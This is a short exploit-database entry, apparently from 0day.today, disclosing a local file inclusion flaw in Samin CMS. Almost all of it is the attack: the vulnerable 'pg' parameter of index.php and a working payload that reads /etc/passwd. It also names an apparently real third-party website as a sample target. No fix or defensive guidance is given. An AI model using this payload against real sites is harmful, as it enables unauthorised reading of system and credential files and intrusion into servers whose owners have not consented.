id: 13123
date: 07/05/2010
title: Samin CMS LFI Vulnerability
author: Arash Saadatfar
cves: 

===========================
Samin CMS LFI Vulnerability 
===========================


[~]######################################### InformatioN #############################################[~]

[~] Title : Samin CMS LFI Vulnerability
[~] Author: Arash Saadatfar
[~] Vendor: http://see.ir
[~] Example : http://olampiyad.ir/index.php?pg=/etc/passwd


[~]######################################### ExploiT #############################################[~]

[~] Vulnerable File :

http://server/index.php?pg=[LFI]

[~] Example :

http://server/index.php?pg=/etc/passwd


[~]######################################### FinisH #############################################[~]



#  0day.today [2023-03-26]  #